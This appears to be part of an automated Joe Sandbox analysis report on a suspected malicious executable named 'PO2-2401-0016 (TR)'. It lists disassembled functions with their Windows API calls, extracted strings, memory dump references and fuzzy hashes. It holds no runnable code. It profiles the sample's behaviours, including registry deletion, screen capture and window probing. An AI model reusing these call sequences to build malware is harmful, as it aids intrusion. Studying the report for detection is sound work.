                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                • String ID:
                                • API String ID: 3800310941-3916222277
                                • Opcode ID: d0f0f76b83423dd72d93ddf2fa1c3bedb57acacc4740357d7e79515415217e37
                                • Instruction ID: 57bc27fd7e66794e956fa27ecd59b972446767756cdc8f9238d22c7ca00916d9
                                • Opcode Fuzzy Hash: d0f0f76b83423dd72d93ddf2fa1c3bedb57acacc4740357d7e79515415217e37
                                • Instruction Fuzzy Hash: 1E515CB1600245BFDB218FA4CD88FAB7BBCFB28744F00841DF94996650DB30ED459BA1
                                Function 001E856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 001E8592
                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001E85A2
                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001E85AD
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001E85BA
                                • GlobalLock.KERNEL32(00000000), ref: 001E85C8
                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001E85D7
                                • GlobalUnlock.KERNEL32(00000000), ref: 001E85E0
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001E85E7
                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001E85F8
                                • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,001EFC38,?), ref: 001E8611
                                • GlobalFree.KERNEL32(00000000), ref: 001E8621
                                • GetObjectW.GDI32(?,00000018,?), ref: 001E8641
                                • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 001E8671
                                • DeleteObject.GDI32(?), ref: 001E8699
                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 001E86AF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                • String ID:
                                • API String ID: 3840717409-0
                                • Opcode ID: 6e4242230b918421bf117b330e8e8bdfea36f6de314ddba5b61a4f423f712ffc
                                • Instruction ID: 531392b2a654cf94237b56636f7f2ef4b03352c59a4201793c89ade2b9574e06
                                • Opcode Fuzzy Hash: 6e4242230b918421bf117b330e8e8bdfea36f6de314ddba5b61a4f423f712ffc
                                • Instruction Fuzzy Hash: 18411975600285AFDB11DFA5CC88EAEBBB8FF89715F104158F919EB260DB309942DB60
                                Function 001C14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                Download Yara Rule
                                APIs
                                • VariantInit.OLEAUT32(00000000), ref: 001C1502
                                • VariantCopy.OLEAUT32(?,?), ref: 001C150B
                                • VariantClear.OLEAUT32(?), ref: 001C1517
                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 001C15FB
                                • VarR8FromDec.OLEAUT32(?,?), ref: 001C1657
                                • VariantInit.OLEAUT32(?), ref: 001C1708
                                • SysFreeString.OLEAUT32(?), ref: 001C178C
                                • VariantClear.OLEAUT32(?), ref: 001C17D8
                                • VariantClear.OLEAUT32(?), ref: 001C17E7
                                • VariantInit.OLEAUT32(00000000), ref: 001C1823
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                • API String ID: 1234038744-3931177956
                                • Opcode ID: 2c0b8891b99fd733365ce09d870efd67d1141528356a77044438b7c48db292ef
                                • Instruction ID: b0af2e6ba45a7b19a998427d4a83240d02c3140056abde2e82de3e0814636c8b
                                • Opcode Fuzzy Hash: 2c0b8891b99fd733365ce09d870efd67d1141528356a77044438b7c48db292ef
                                • Instruction Fuzzy Hash: F1D12232A40210EBCB049F64E885F7DB7B1BF67B00F51809EE806AB182DB30EC55DB91
                                Function 001DB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                  • Part of subcall function 001DC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001DB6AE,?,?), ref: 001DC9B5
                                  • Part of subcall function 001DC998: _wcslen.LIBCMT ref: 001DC9F1
                                  • Part of subcall function 001DC998: _wcslen.LIBCMT ref: 001DCA68
                                  • Part of subcall function 001DC998: _wcslen.LIBCMT ref: 001DCA9E
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001DB6F4
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001DB772
                                • RegDeleteValueW.ADVAPI32(?,?), ref: 001DB80A
                                • RegCloseKey.ADVAPI32(?), ref: 001DB87E
                                • RegCloseKey.ADVAPI32(?), ref: 001DB89C
                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 001DB8F2
                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001DB904
                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 001DB922
                                • FreeLibrary.KERNEL32(00000000), ref: 001DB983
                                • RegCloseKey.ADVAPI32(00000000), ref: 001DB994
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                • String ID: RegDeleteKeyExW$advapi32.dll
                                • API String ID: 146587525-4033151799
                                • Opcode ID: 0f4a728cbc8a2ee426d097ce7c55b1c0d4b2bdd07961685afdbea9c89a2d4df1
                                • Instruction ID: 41cdf8b803d9a026a25f816a7d21db6a6efdbdd8aff31dec16152f68b0cbb75a
                                • Opcode Fuzzy Hash: 0f4a728cbc8a2ee426d097ce7c55b1c0d4b2bdd07961685afdbea9c89a2d4df1
                                • Instruction Fuzzy Hash: 67C17A34208241EFD714DF24C8D5B2ABBE1BF84318F55855DF8AA4B3A2CB75E846CB91
                                Function 001D255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(00000000), ref: 001D25D8
                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 001D25E8
                                • CreateCompatibleDC.GDI32(?), ref: 001D25F4
                                • SelectObject.GDI32(00000000,?), ref: 001D2601
                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 001D266D
                                • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 001D26AC
                                • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 001D26D0
                                • SelectObject.GDI32(?,?), ref: 001D26D8
                                • DeleteObject.GDI32(?), ref: 001D26E1
                                • DeleteDC.GDI32(?), ref: 001D26E8
                                • ReleaseDC.USER32(00000000,?), ref: 001D26F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                • String ID: (
                                • API String ID: 2598888154-3887548279
                                • Opcode ID: 5eb8b3b9281977fc675cc1aa61cef812c3286625f347da659e6a7b24c947594e
                                • Instruction ID: 32366ef68d2cb7e2b455021d5073a523e199db7b50ffaf7f8f4b15dac6d7b865
                                • Opcode Fuzzy Hash: 5eb8b3b9281977fc675cc1aa61cef812c3286625f347da659e6a7b24c947594e
                                • Instruction Fuzzy Hash: 8F61C1B5D00219EFCB14CFA8DC84AAEBBB6FF58310F20852AE955A7350D774A951CF90
                                Function 0018DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___free_lconv_mon.LIBCMT ref: 0018DAA1
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D659
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D66B
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D67D
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D68F
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D6A1
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D6B3
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D6C5
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D6D7
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D6E9
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D6FB
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D70D
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D71F
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D731
                                • _free.LIBCMT ref: 0018DA96
                                  • Part of subcall function 001829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000), ref: 001829DE
                                  • Part of subcall function 001829C8: GetLastError.KERNEL32(00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000,00000000), ref: 001829F0
                                • _free.LIBCMT ref: 0018DAB8
                                • _free.LIBCMT ref: 0018DACD
                                • _free.LIBCMT ref: 0018DAD8
                                • _free.LIBCMT ref: 0018DAFA
                                • _free.LIBCMT ref: 0018DB0D
                                • _free.LIBCMT ref: 0018DB1B
                                • _free.LIBCMT ref: 0018DB26
                                • _free.LIBCMT ref: 0018DB5E
                                • _free.LIBCMT ref: 0018DB65
                                • _free.LIBCMT ref: 0018DB82
                                • _free.LIBCMT ref: 0018DB9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                • String ID:
                                • API String ID: 161543041-0
                                • Opcode ID: cbc8953d7d4b8dcb9b4ee82a4b2ca2b9f702201be4733a06482567f12a8bd0b8
                                • Instruction ID: 4a91c1c0325c8934cdcf5674f1353731a7c9c8fa52d13f36c735cf8abada8a20
                                • Opcode Fuzzy Hash: cbc8953d7d4b8dcb9b4ee82a4b2ca2b9f702201be4733a06482567f12a8bd0b8
                                • Instruction Fuzzy Hash: F4313731A443059FEB26BA39F845B5AB7E9FF21324F264429E449D7191DF35AE808F20
                                Function 001B365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetClassNameW.USER32(?,?,00000100), ref: 001B369C
                                • _wcslen.LIBCMT ref: 001B36A7
                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 001B3797
                                • GetClassNameW.USER32(?,?,00000400), ref: 001B380C
                                • GetDlgCtrlID.USER32(?), ref: 001B385D
                                • GetWindowRect.USER32(?,?), ref: 001B3882
                                • GetParent.USER32(?), ref: 001B38A0
                                • ScreenToClient.USER32(00000000), ref: 001B38A7
                                • GetClassNameW.USER32(?,?,00000100), ref: 001B3921
                                • GetWindowTextW.USER32(?,?,00000400), ref: 001B395D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                • String ID: %s%u
                                • API String ID: 4010501982-679674701
                                • Opcode ID: c787450e7e13e4d5d7a767ccadc07dc49ecf575722502a244da1af47334fcc6c
                                • Instruction ID: 562c0c7536aecb1dcd698c691e8e14177ee4be895276a20283c89927e1c7e8fe
                                • Opcode Fuzzy Hash: c787450e7e13e4d5d7a767ccadc07dc49ecf575722502a244da1af47334fcc6c
                                • Instruction Fuzzy Hash: 2891D571204706EFD718DF64C885BEAF7A9FF44304F008619F9A9C6190DB30EA66CB91
                                Function 001B4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                Download Yara Rule
                                APIs
                                • GetClassNameW.USER32(?,?,00000400), ref: 001B4994
                                • GetWindowTextW.USER32(?,?,00000400), ref: 001B49DA
                                • _wcslen.LIBCMT ref: 001B49EB
                                • CharUpperBuffW.USER32(?,00000000), ref: 001B49F7
                                • _wcsstr.LIBVCRUNTIME ref: 001B4A2C
                                • GetClassNameW.USER32(00000018,?,00000400), ref: 001B4A64
                                • GetWindowTextW.USER32(?,?,00000400), ref: 001B4A9D
                                • GetClassNameW.USER32(00000018,?,00000400), ref: 001B4AE6
                                • GetClassNameW.USER32(?,?,00000400), ref: 001B4B20
                                • GetWindowRect.USER32(?,?), ref: 001B4B8B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                • String ID: ThumbnailClass
                                • API String ID: 1311036022-1241985126
                                • Opcode ID: d91afb4ae12f5918d7dc65362296f35fddf88aee4794562557d6aefcb9e458de
                                • Instruction ID: cc9497b8ce8579cdc645bca5a38b5642e3ee7f90f4c532047cbef99853791775
                                • Opcode Fuzzy Hash: d91afb4ae12f5918d7dc65362296f35fddf88aee4794562557d6aefcb9e458de
                                • Instruction Fuzzy Hash: E691BE710042059FDB04DF14C981BEA7BE9FF98714F048469FE869A197DB30ED46CBA1
                                Function 001E8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00169BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00169BB2
                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001E8D5A
                                • GetFocus.USER32 ref: 001E8D6A
                                • GetDlgCtrlID.USER32(00000000), ref: 001E8D75
                                • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 001E8E1D
                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 001E8ECF
                                • GetMenuItemCount.USER32(?), ref: 001E8EEC
                                • GetMenuItemID.USER32(?,00000000), ref: 001E8EFC
                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 001E8F2E
                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 001E8F70
                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001E8FA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                • String ID: 0
                                • API String ID: 1026556194-4108050209
                                • Opcode ID: 63671ca400cd21597da71988ab6afabb300dfb6b741e962b9f341e792e83d8d4
                                • Instruction ID: c45843ab794cf28e3ca2c6b20b7e3a98d5764cf698e74d8457b828fa8b649385
                                • Opcode Fuzzy Hash: 63671ca400cd21597da71988ab6afabb300dfb6b741e962b9f341e792e83d8d4
                                • Instruction Fuzzy Hash: CC81DE71508781AFDB10CF25DC84AAFBBE9FF98714F040919F99897291DB30D941CBA2
                                Function 001BDC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                Download Yara Rule
                                APIs
                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 001BDC20
                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 001BDC46
                                • _wcslen.LIBCMT ref: 001BDC50
                                • _wcsstr.LIBVCRUNTIME ref: 001BDCA0
                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 001BDCBC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                • API String ID: 1939486746-1459072770
                                • Opcode ID: 5cae418755630274ab0ceab435dc3edba94bb931ab118235f4e31d2dd675163a
                                • Instruction ID: 573a1c7742db07a980083406ea6a4360e2d3673ca6a105ebac4962167a778755
                                • Opcode Fuzzy Hash: 5cae418755630274ab0ceab435dc3edba94bb931ab118235f4e31d2dd675163a
                                • Instruction Fuzzy Hash: 00412732940204BBDB08A7B5EC47EFF7BBCEF66750F104069F904A6182FB71991287A5
                                Function 001DCC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 001DCC64
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 001DCC8D
                                • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 001DCD48
                                  • Part of subcall function 001DCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001DCCAA
                                  • Part of subcall function 001DCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 001DCCBD
                                  • Part of subcall function 001DCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001DCCCF
                                  • Part of subcall function 001DCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 001DCD05
                                  • Part of subcall function 001DCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 001DCD28
                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 001DCCF3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                • String ID: RegDeleteKeyExW$advapi32.dll
                                • API String ID: 2734957052-4033151799
                                • Opcode ID: 774cda740f2d10a310b63a88f5e3ba1a871d8827ab1530984c51ba8b3999df5b
                                • Instruction ID: dd7cd1413a60e28c124265ad56957fa8bff1d218fe38e6e5c8bc205270a94f93
                                • Opcode Fuzzy Hash: 774cda740f2d10a310b63a88f5e3ba1a871d8827ab1530984c51ba8b3999df5b
                                • Instruction Fuzzy Hash: BD316F7590112ABBDB208B94DC88EFFBBBDEF55750F000566F905E6240DB349A86DAE0
                                Function 001BE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                Download Yara Rule
                                APIs
                                • timeGetTime.WINMM ref: 001BE6B4
                                  • Part of subcall function 0016E551: timeGetTime.WINMM(?,?,001BE6D4), ref: 0016E555
                                • Sleep.KERNEL32(0000000A), ref: 001BE6E1
                                • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 001BE705
                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 001BE727
                                • SetActiveWindow.USER32 ref: 001BE746
                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001BE754
                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 001BE773
                                • Sleep.KERNEL32(000000FA), ref: 001BE77E
                                • IsWindow.USER32 ref: 001BE78A
                                • EndDialog.USER32(00000000), ref: 001BE79B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                • String ID: BUTTON
                                • API String ID: 1194449130-3405671355
                                • Opcode ID: 8d406aad15bd029285a84607ee4b49d85aa534fac1cde1823edbb2ea3edaf226
                                • Instruction ID: a7fe1fcf2dd765c1a3cf34a865e1e397d956cd75ab2c05ca43d3e281d7e7ad1b
                                • Opcode Fuzzy Hash: 8d406aad15bd029285a84607ee4b49d85aa534fac1cde1823edbb2ea3edaf226
                                • Instruction Fuzzy Hash: AE216571600244FFEB205FE0FCCDEBA3BADEB65348F102424F815956B1DB729C568A94
                                Function 001BE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 001BEA5D
                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 001BEA73
                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001BEA84
                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 001BEA96
                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 001BEAA7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
